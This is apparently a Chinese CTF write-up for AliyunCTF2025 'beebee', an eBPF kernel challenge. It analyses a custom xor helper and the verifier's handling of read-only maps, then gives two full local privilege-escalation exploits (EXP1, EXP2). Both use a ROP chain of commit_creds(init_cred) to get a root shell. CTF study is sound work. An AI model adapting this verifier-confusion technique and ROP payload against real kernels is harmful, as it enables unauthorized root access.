Dig into ebpf (一) —— AliyunCTF2025 beebee

拖了一年之后终于开始接触ebpf了, 但ebpf的verifier细节太多, 直接上源码分析工作量太大, 正好这道beebee不太需要理解verifier的细节hh.

分析

题目添加了一个helper函数, 其实质是一个8字节的内存写原语. 由于res参数的类型带有MEM_RDONLY标志, 这意味着可以用它改写一些只读内存. (从bpf_aliyunctf_xor的实现可以看出, 这里的“只读”是eBPF层面的概念, 而不是页面权限层面的概念.)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
/* MEM_RDONLY -- MEM is read-only. When applied on bpf_arg, it indicates the arg is
* compatible with both mutable and immutable memory.
*/
/* ARG_PTR_TO_MEM -- pointer to valid memory (stack, packet, map value) */

/* Prototype describing the argument and return types of the bpf_aliyunctf_xor
 * helper.
 */
const struct bpf_func_proto bpf_aliyunctf_xor_proto = {
.func = bpf_aliyunctf_xor,
.gpl_only = false,
.ret_type = RET_INTEGER,
/* arg1 (buf): memory pointer; MEM_RDONLY on an argument means both mutable
 * and immutable memory are accepted.
 */
.arg1_type = ARG_PTR_TO_MEM | MEM_RDONLY,
/* arg2 (buf_len): presumably the byte size paired with arg1 -- confirm */
.arg2_type = ARG_CONST_SIZE,
/* arg3 (res): fixed-size destination of arg3_size bytes. It also carries
 * MEM_RDONLY, so immutable memory is accepted for the pointer the helper
 * writes through.
 */
.arg3_type = ARG_PTR_TO_FIXED_SIZE_MEM | MEM_UNINIT | MEM_ALIGNED | MEM_RDONLY,
.arg3_size = sizeof(s64),
};

/* bpf_aliyunctf_xor - XOR an 8-byte input with the constant 2025.
 *
 * @buf:     input buffer, read as a single s64
 * @buf_len: must equal sizeof(s64)
 * @res:     destination that receives (2025 ^ *(s64 *)buf)
 *
 * Returns -EINVAL when @buf_len != sizeof(s64), otherwise 0.
 * The result is written through @res with a plain store and no further check.
 */
BPF_CALL_3(bpf_aliyunctf_xor, const char *, buf, size_t, buf_len, s64 *, res) {
s64 _res = 2025;

if (buf_len != sizeof(s64))
return -EINVAL;

_res ^= *(s64 *)buf;
*res = _res;

return 0;
}



改写只读内存的原语该如何利用? 首先想到的是改写一些敏感数据, 类似用户态利用中改写字符串表、符号表的操作. 但ARG_PTR_TO_MEM类型的指针只能指向stack, packet, map value, 而这些数据在合法范围内都是非敏感的.

于是回到ebpf exploit的经典思路 —— 欺骗verifier. 如果verifier将RDONLY内存中读取的值认为是定值, 而我们通过该helper方法修改它, 这就能造成verifier与运行时不一致的情况.

首先尝试在kernel/bpf目录下搜索MEM_RDONLY, 但并没有找到verifier对该标志内存访问的特殊处理. 转而搜索RDONLY, 找到bpf_map_is_rdonly函数.

从注释中得知, 如果map

  • 在创建时指定了BPF_F_RDONLY_PROG标志(程序侧无法修改)
  • 在用户空间进行了初始化并被frozen(用户侧无法修改)
  • 所有并行/未完成的更新操作已经完成

则该map是只读的.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
/* Return true only when @map carries BPF_F_RDONLY_PROG, has been frozen, and
 * has no write currently active; the comment inside explains each condition.
 */
static bool bpf_map_is_rdonly(const struct bpf_map *map)
{
/* A map is considered read-only if the following condition are true:
*
* 1) BPF program side cannot change any of the map content. The
* BPF_F_RDONLY_PROG flag is throughout the lifetime of a map
* and was set at map creation time.
* 2) The map value(s) have been initialized from user space by a
* loader and then "frozen", such that no new map update/delete
* operations from syscall side are possible for the rest of
* the map's lifetime from that point onwards.
* 3) Any parallel/pending map update/delete operations from syscall
* side have been completed. Only after that point, it's safe to
* assume that map value(s) are immutable.
*/
/* The three operands below correspond to conditions 1), 2) and 3). */
return (map->map_flags & BPF_F_RDONLY_PROG) &&
READ_ONCE(map->frozen) &&
!bpf_map_write_active(map);
}

查找交叉引用, 在check_mem_access函数中找到了与预期相符的特殊处理: 从只读map中读取时, verifier会直接读出map中的值, 并将value_regno对应的寄存器标记为verify阶段的已知常量.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
/* check whether memory at (regno + off) is accessible for t = (read | write)
* if t==write, value_regno is a register which value is stored into memory
* if t==read, value_regno is a register which will receive the value from memory
* if t==write && value_regno==-1, some unknown value is stored into memory
* if t==read && value_regno==-1, don't care what we read from memory
*/
static int check_mem_access(struct bpf_verifier_env *env, int insn_idx, u32 regno,
int off, int bpf_size, enum bpf_access_type t,
int value_regno, bool strict_alignment_once, bool is_ldsx)
{
......
} else if (t == BPF_READ && value_regno >= 0) {
struct bpf_map *map = reg->map_ptr;

/* if map is read-only, track its contents as scalars */
if (tnum_is_const(reg->var_off) &&
bpf_map_is_rdonly(map) &&
map->ops->map_direct_value_addr) {
int map_off = off + reg->var_off.value;
u64 val = 0;

err = bpf_map_direct_read(map, map_off, size,
&val, is_ldsx);
if (err)
return err;

regs[value_regno].type = SCALAR_VALUE;
__mark_reg_known(&regs[value_regno], val);
} else {
mark_reg_unknown(env, regs, value_regno);
}
}
......

利用

利用思路

于是思路明确了, 首先创建一个只读的map, 保存一个offset(初始设为0). 通过helper将这个offset改为一个可以越界的偏移, 然后将skb中保存的ROP链复制到当前栈帧加上该offset的位置, 由于map只读且offset的初值为0, 所以verifier会认为这次写入是在合法范围内的.
通过这样的方式即可覆盖返回地址ROP提权.

不过还是确认一下源码中STX到栈的相关范围检查

1
2
3
4
5
6
7
8
9
10
11
12
} else if (reg->type == PTR_TO_STACK) {
/* Basic bounds checks. */
err = check_stack_access_within_bounds(env, regno, off, size, ACCESS_DIRECT, t);
if (err)
return err;

if (t == BPF_READ)
err = check_stack_read(env, regno, off, size,
value_regno);
else
err = check_stack_write(env, regno, off, size,
value_regno, insn_idx);
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
/* Check that the stack access at 'regno + off' falls within the maximum stack
* bounds.
*
* 'off' includes `regno->offset`, but not its dynamic part (if any).
*
* Returns -EACCES for an unbounded variable offset or a start offset rejected
* by check_stack_slot_within_bounds(), -EINVAL when the access would reach a
* non-negative offset, -EFAULT for a negative access_size, and otherwise the
* result of grow_stack_state().
*/
static int check_stack_access_within_bounds(
struct bpf_verifier_env *env,
int regno, int off, int access_size,
enum bpf_access_src src, enum bpf_access_type type)
{
struct bpf_reg_state *regs = cur_regs(env);
struct bpf_reg_state *reg = regs + regno;
struct bpf_func_state *state = func(env, reg);
s64 min_off, max_off;
int err;
char *err_extra;

if (src == ACCESS_HELPER)
/* We don't know if helpers are reading or writing (or both). */
err_extra = " indirect access to";
else if (type == BPF_READ)
err_extra = " read from";
else
err_extra = " write to";

if (tnum_is_const(reg->var_off)) {
// Constant register offset: the access covers
// [value + off, value + off + access_size).
min_off = (s64)reg->var_off.value + off;
max_off = min_off + access_size;
} else {
// Variable offset: derive the range from smin_value/smax_value,
// rejecting offsets at or beyond +/-BPF_MAX_VAR_OFF.
if (reg->smax_value >= BPF_MAX_VAR_OFF ||
reg->smin_value <= -BPF_MAX_VAR_OFF) {
verbose(env, "invalid unbounded variable-offset%s stack R%d\n",
err_extra, regno);
return -EACCES;
}
min_off = reg->smin_value + off;
max_off = reg->smax_value + off + access_size;
}

// Validate the access: the lowest offset must pass the slot check for this
// access type, and the upper end must not extend past offset 0.
err = check_stack_slot_within_bounds(env, min_off, state, type);
if (!err && max_off > 0)
err = -EINVAL; /* out of stack access into non-negative offsets */
if (!err && access_size < 0)
/* access_size should not be negative (or overflow an int); others checks
* along the way should have prevented such an access.
*/
err = -EFAULT; /* invalid negative access size; integer overflow? */

if (err) {
if (tnum_is_const(reg->var_off)) {
verbose(env, "invalid%s stack R%d off=%d size=%d\n",
err_extra, regno, off, access_size);
} else {
char tn_buf[48];

tnum_strn(tn_buf, sizeof(tn_buf), reg->var_off);
verbose(env, "invalid variable-offset%s stack R%d var_off=%s size=%d\n",
err_extra, regno, tn_buf, access_size);
}
return err;
}

// Grow the tracked stack state to cover -min_off, rounded up to BPF_REG_SIZE.
return grow_stack_state(env, state, round_up(-min_off, BPF_REG_SIZE));
}

check_stack_slot_within_bounds将读写范围限制在栈内, 并根据allow_uninit_stack来判断是否需要禁止读取尚未分配的栈空间.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
/* Check that the stack access at the given offset is within bounds. The
* maximum valid offset is -1.
*
* The minimum valid offset is -MAX_BPF_STACK for writes (and for any access
* when env->allow_uninit_stack is set), and -state->allocated_stack for
* reads otherwise.
*
* Returns 0 when off lies in [min_valid_off, -1], -EACCES otherwise.
*/
static int check_stack_slot_within_bounds(struct bpf_verifier_env *env,
s64 off,
struct bpf_func_state *state,
enum bpf_access_type t)
{
int min_valid_off;

/* Writes, and reads when uninitialized stack is allowed, may reach the
 * full stack; other reads are limited to the already allocated part.
 */
if (t == BPF_WRITE || env->allow_uninit_stack)
min_valid_off = -MAX_BPF_STACK;
else
min_valid_off = -state->allocated_stack;

if (off < min_valid_off || off > -1)
return -EACCES;
return 0;
}

明确思路后编写exp, 调试主要是看verifier的报错信息, 以及直接调试jit编译出来的机器码.
例如下图即为map不为只读的情况下, 读出的offset会被认为是无界值, 而无界值与指针的运算是不允许的.

EXP1

在root用户下调完exp后, 切换到普通用户测试, 正准备收工的笔者发现, exp1在普通用户下没法提权.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
#include <kernelpwn.h>
#include "bpf.h"

int map_fd;

/*
 * initMap - create, initialise and freeze the single-element array map.
 *
 * Creates a BPF_MAP_TYPE_ARRAY map flagged BPF_F_RDONLY_PROG with an int key
 * and an int64_t value, stores the initial value 0 under key 0, then freezes
 * the map. The descriptor is left in the global map_fd.
 *
 * Every step is checked; a failure is reported through err_exit(), which is
 * expected not to return (NOTE(review): confirm against kernelpwn.h).
 */
void initMap()
{
    map_fd = bpf_create_map(BPF_MAP_TYPE_ARRAY,
                            sizeof(int), sizeof(int64_t), 1, BPF_F_RDONLY_PROG);
    if (map_fd < 0) {
        err_exit("BPF_MAP_CREATE");
    }

    int key = 0;
    /* Typed to match the value size passed to bpf_create_map above. */
    int64_t value = 0;
    if (bpf_update_elem(map_fd, &key, &value, 0) < 0) {
        err_exit("BPF_MAP_UPDATE_ELEM");
    }

    int err = bpf_map_freeze(map_fd);
    if (err == -1) {
        loge("bpf(BPF_MAP_FREEZE):%s", bpf_log_buf);
        err_exit("BPF_MAP_FREEZE");
    }
}


// Hard-coded absolute kernel addresses for the target kernel image
// (assumes the addresses are fixed for that build -- TODO confirm).
// prepare_kernel_cred and msleep are not referenced by the code in this listing.
size_t prepare_kernel_cred = 0xffffffff810c1c60;
size_t init_cred = 0xffffffff82a52fa0;
size_t commit_creds = 0xffffffff810c19b0;
size_t do_sys_vfork = 0xffffffff8108d2f0;
size_t msleep = 0xffffffff8113dfd0;
size_t pop_rdi = 0xffffffff81142d79;


// Helper id passed to BPF_EMIT_CALL for the challenge's bpf_aliyunctf_xor helper.
#define BPF_FUNC_aliyunctf_xor 212
// Not referenced by the code in this listing.
#define RETADDR_OFFSET 0x28

// EXP1: rewrite the frozen map's value (an offset, initially 0) through the
// xor helper, then use the re-read value as a stack offset for skb_load_bytes.
int main()
{
// Receives the bpf_prog_skb_run() result below; it is never checked.
int err;

initMap();

// Payload handed to bpf_prog_skb_run() as packet data; 4 entries of size_t
// (32 bytes assuming an 8-byte size_t).
size_t ropchain[] = {
pop_rdi,
init_cred,
commit_creds,
do_sys_vfork
};

struct bpf_insn insns[] = {
BPF_MOV64_IMM(BPF_REG_0, 0xdeadbeef),

// reg9: offset
// reg6: map_fd
// reg8: skb

// Save r1 (program context at entry) in r8 and load the map into r6/r1.
BPF_MOV64_REG(BPF_REG_8, BPF_REG_1),
BPF_LD_MAP_FD(BPF_REG_6, map_fd),
BPF_MOV64_REG(BPF_REG_1, BPF_REG_6),


// key = 0 at fp-8; r7 = map_lookup_elem(map, &key)
BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
BPF_ALU64_IMM(BPF_ADD,BPF_REG_2,-8),
BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
BPF_MOV64_REG(BPF_REG_7,BPF_REG_0),

// Exit when the lookup returned NULL; otherwise skip the exit.
BPF_JMP_IMM(BPF_JNE, BPF_REG_7, 0, 1),
BPF_EXIT_INSN(),


// Call the xor helper with buf = fp-8, buf_len = 8, res = map value (r7).
// The helper stores 2025 ^ *buf, so pre-XORing the input with 2025 makes
// the map value become sizeof(ropchain)+8.
BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, ((sizeof(ropchain)+8)^2025)),
BPF_MOV64_REG(BPF_REG_1, BPF_REG_10),
BPF_ALU64_IMM(BPF_ADD,BPF_REG_1,-8),
BPF_MOV64_IMM(BPF_REG_2,8),
BPF_MOV64_REG(BPF_REG_3, BPF_REG_7),
BPF_EMIT_CALL(BPF_FUNC_aliyunctf_xor),

// r9 = map value (the offset), then
// skb_load_bytes(skb = r8, offset = 0, to = fp - sizeof(ropchain) + r9,
//                len = sizeof(ropchain)).
// Per the check_mem_access excerpt, the verifier treats a load from a
// read-only map as the constant currently stored there (0 from initMap),
// while at run time r9 holds the value written by the helper.
BPF_LDX_MEM(BPF_DW, BPF_REG_9, BPF_REG_7, 0),
BPF_MOV64_REG(BPF_REG_1, BPF_REG_8),
BPF_MOV64_IMM(BPF_REG_2, 0),
BPF_MOV64_REG(BPF_REG_3, BPF_REG_10),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, -sizeof(ropchain)),
BPF_ALU64_REG(BPF_ADD, BPF_REG_3, BPF_REG_9),
BPF_MOV64_IMM(BPF_REG_4, sizeof(ropchain)),
BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

BPF_EXIT_INSN(),

};


// Load as a socket filter; on failure print the log buffer and exit.
int progfd = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER,
insns, sizeof(insns) / sizeof(insns[0]),
"GPL v2");
if (progfd == -1) {
loge("bpf(BPF_PROG_LOAD):%s",bpf_log_buf);
exit(-1);
}



// Run the program with ropchain as the packet payload.
err = bpf_prog_skb_run(progfd, ropchain, sizeof(ropchain));

system("/bin/sh");

return 0;
}

对比root(上图)和普通用户(下图)生成的机器码, 最担心的情况还是发生了. 其实在最开始分析利用方法的时候我就在思考这样一个场景, 既然verifier已经能确定从只读map中读出的数据值, 那为什么不直接在jitcode中进行常量优化呢? 下图中,offset直接使用了r10的零值, 而不是从map中读取到的r15值. (为啥只在普通用户下有这个优化……)

EXP2

笔者尝试思考一种无法进行常量优化的场景, 但这似乎与欺骗verifier的前提矛盾, 无果.
无奈之下, 尝试用改写size的方式替代改写offset的方式来碰碰运气.

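然后, 它成了……(不理解, 看看之后有没有时间研究一下). 补充一个有待验证的猜测: 非特权模式下, verifier会为指针算术插入Spectre v1缓解用的掩码指令(sanitize_ptr_alu, 借助辅助寄存器BPF_REG_AX, 在x86-64 JIT中对应r10), 超出verifier认定范围的偏移在运行时会被清零, 这与EXP1中“offset使用了r10的零值”的现象吻合; 而传给helper的size参数不经过这一掩码, 所以改写size的方式仍然有效.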

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
#include <kernelpwn.h>
#include "bpf.h"

int map_fd;

/*
 * initMap - create, initialise and freeze the single-element array map.
 *
 * Creates a BPF_MAP_TYPE_ARRAY map flagged BPF_F_RDONLY_PROG with an int key
 * and an int64_t value, stores the initial value 8 under key 0, then freezes
 * the map. The descriptor is left in the global map_fd.
 *
 * Every step is checked; a failure is reported through err_exit(), which is
 * expected not to return (NOTE(review): confirm against kernelpwn.h).
 */
void initMap()
{
    map_fd = bpf_create_map(BPF_MAP_TYPE_ARRAY,
                            sizeof(int), sizeof(int64_t), 1, BPF_F_RDONLY_PROG);
    if (map_fd < 0) {
        err_exit("BPF_MAP_CREATE");
    }

    int key = 0;
    /* Typed to match the value size passed to bpf_create_map above. */
    int64_t value = 8;
    if (bpf_update_elem(map_fd, &key, &value, 0) < 0) {
        err_exit("BPF_MAP_UPDATE_ELEM");
    }

    int err = bpf_map_freeze(map_fd);
    if (err == -1) {
        loge("bpf(BPF_MAP_FREEZE):%s", bpf_log_buf);
        err_exit("BPF_MAP_FREEZE");
    }
}


// Hard-coded absolute kernel addresses for the target kernel image
// (assumes the addresses are fixed for that build -- TODO confirm).
// prepare_kernel_cred and msleep are not referenced by the code in this listing.
size_t prepare_kernel_cred = 0xffffffff810c1c60;
size_t init_cred = 0xffffffff82a52fa0;
size_t commit_creds = 0xffffffff810c19b0;
size_t do_sys_vfork = 0xffffffff8108d2f0;
size_t msleep = 0xffffffff8113dfd0;
size_t pop_rdi = 0xffffffff81142d79;


// Helper id passed to BPF_EMIT_CALL for the challenge's bpf_aliyunctf_xor helper.
#define BPF_FUNC_aliyunctf_xor 212
// Not referenced by the code in this listing.
#define RETADDR_OFFSET 0x28

// EXP2: rewrite the frozen map's value (a size, initially 8) through the xor
// helper, then use the re-read value as the length for skb_load_bytes.
int main()
{
// Receives the bpf_prog_skb_run() result below; it is never checked.
int err;

initMap();

// Payload handed to bpf_prog_skb_run() as packet data. It is copied starting
// at fp-8, so the two leading zero entries occupy the first 16 bytes of the
// destination ahead of the four address entries.
size_t ropchain[] = {
0,
0,
pop_rdi,
init_cred,
commit_creds,
do_sys_vfork
};

struct bpf_insn insns[] = {
BPF_MOV64_IMM(BPF_REG_0, 0xdeadbeef),

// reg9: size
// reg6: map_fd
// reg8: skb

// Save r1 (program context at entry) in r8 and load the map into r6/r1.
BPF_MOV64_REG(BPF_REG_8, BPF_REG_1),
BPF_LD_MAP_FD(BPF_REG_6, map_fd),
BPF_MOV64_REG(BPF_REG_1, BPF_REG_6),


// key = 0 at fp-8; r7 = map_lookup_elem(map, &key)
BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
BPF_ALU64_IMM(BPF_ADD,BPF_REG_2,-8),
BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
BPF_MOV64_REG(BPF_REG_7,BPF_REG_0),

// Exit when the lookup returned NULL; otherwise skip the exit.
BPF_JMP_IMM(BPF_JNE, BPF_REG_7, 0, 1),
BPF_EXIT_INSN(),


// Call the xor helper with buf = fp-8, buf_len = 8, res = map value (r7).
// The helper stores 2025 ^ *buf, so pre-XORing the input with 2025 makes
// the map value become sizeof(ropchain).
BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, ((sizeof(ropchain))^2025)),
BPF_MOV64_REG(BPF_REG_1, BPF_REG_10),
BPF_ALU64_IMM(BPF_ADD,BPF_REG_1,-8),
BPF_MOV64_IMM(BPF_REG_2,8),
BPF_MOV64_REG(BPF_REG_3, BPF_REG_7),
BPF_EMIT_CALL(BPF_FUNC_aliyunctf_xor),

// r9 = map value (the size), then
// skb_load_bytes(skb = r8, offset = 0, to = fp - 8, len = r9).
// Per the check_mem_access excerpt, the verifier treats a load from a
// read-only map as the constant currently stored there (8 from initMap),
// while at run time r9 holds the value written by the helper.
BPF_LDX_MEM(BPF_DW, BPF_REG_9, BPF_REG_7, 0),
BPF_MOV64_REG(BPF_REG_1, BPF_REG_8),
BPF_MOV64_IMM(BPF_REG_2, 0),
BPF_MOV64_REG(BPF_REG_3, BPF_REG_10),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, -8),
BPF_MOV64_REG(BPF_REG_4, BPF_REG_9),
BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

BPF_EXIT_INSN(),

};


// Load as a socket filter; on failure print the log buffer and exit.
int progfd = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER,
insns, sizeof(insns) / sizeof(insns[0]),
"GPL v2");
if (progfd == -1) {
loge("bpf(BPF_PROG_LOAD):%s",bpf_log_buf);
exit(-1);
}



// Run the program with ropchain as the packet payload.
err = bpf_prog_skb_run(progfd, ropchain, sizeof(ropchain));

system("/bin/sh");

return 0;
}
  • 版权声明: 本博客所有文章除特别声明外,著作权归作者所有。转载请注明出处!
  • Copyrights © 2022-2025 翰青HanQi

请我喝杯咖啡吧~

支付宝
微信